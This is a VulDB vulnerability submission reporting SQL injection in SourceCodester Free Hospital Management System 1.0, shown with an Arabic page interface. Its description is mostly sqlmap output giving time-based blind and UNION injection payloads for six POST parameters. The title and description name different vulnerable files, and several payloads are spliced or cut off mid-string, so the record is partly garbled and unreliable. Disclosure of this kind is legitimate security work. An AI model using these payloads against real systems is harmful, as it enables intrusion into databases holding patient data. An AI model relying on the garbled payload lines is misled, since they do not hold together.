إرسال #195609: A vulnerability classified as critical has been found in SourceCodester Free Hospital Management System for Small Practices 1.0. Affected is an unknown function of the file vm\patient\edit-user.phpالمعلومات

عنوانA vulnerability classified as critical has been found in SourceCodester Free Hospital Management System for Small Practices 1.0. Affected is an unknown function of the file vm\patient\edit-user.php
الوصفA vulnerability classified as critical has been found in SourceCodester Free Hospital Management System for Small Practices 1.0. Affected is an unknown function of the file vm\doctor\edit-doc.php The manipulation of the argument $id00,$nic,$oldemail,$email,$spec,$Tele leads to sql injection ``` Parameter: id00 (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id00=2' AND (SELECT 3966 FROM (SELECT(SLEEP(5)))CuGj) AND 'fhTa'='for.com&name=Dr.Akash Sanap&nic=234&Tele=8080808080&spec=1&password=doctor&cpassw Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: id00=-8690' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a4796872624b4e6f68496e55726767636669596c6d,0x7178707a71),NULL-- -&oldemail=doctorh Sanap&nic=234&Tele=8080808080&spec=1&password=doctor&cpassword=doctor Parameter: nic (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id00=2&[email protected]&[email protected]&name=Dr.AT(SLEEP(5)))GcPL) AND 'lCet'='lCet&Tele=8080808080&spec=1&password=doctor&cpassw Parameter: oldemail (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id00=2&[email protected]' AND (SELECT 9085 FROM (SELECT(SLor.com&name=Dr.Akash Sanap&nic=234&Tele=8080808080&spec=1&password=doctor&cpassw Parameter: email (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id00=2&[email protected]&[email protected]' AND (SEL='MEHA&name=Dr.Akash Sanap&nic=234&Tele=8080808080&spec=1&password=doctor&cpassw Parameter: spec (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id00=2&[email protected]&[email protected]&name=Dr.AELECT 8937 FROM (SELECT(SLEEP(5)))anOk)&password=doctor&cpassword=doctor Parameter: Tele (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id00=2&[email protected]&[email protected]&name=Dr.A4213 FROM (SELECT(SLEEP(5)))NXCf) AND 'Mnoz'='Mnoz&spec=1&password=doctor&cpassw ```
المصدر⚠️ https://github.com/CookedMelon/cve/tree/master/hospital/patient-edit
المستخدم
 CookedMelon (UID 52513)
ارسال15/08/2023 05:20 PM (3 سنوات منذ)
الاعتدال20/08/2023 09:01 AM (5 days later)
الحالةتمت الموافقة
إدخال VulDB237565 [SourceCodester Free Hospital Management System for Small Practices vm\patient\edit-user.php حقن SQL]
النقاط20

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!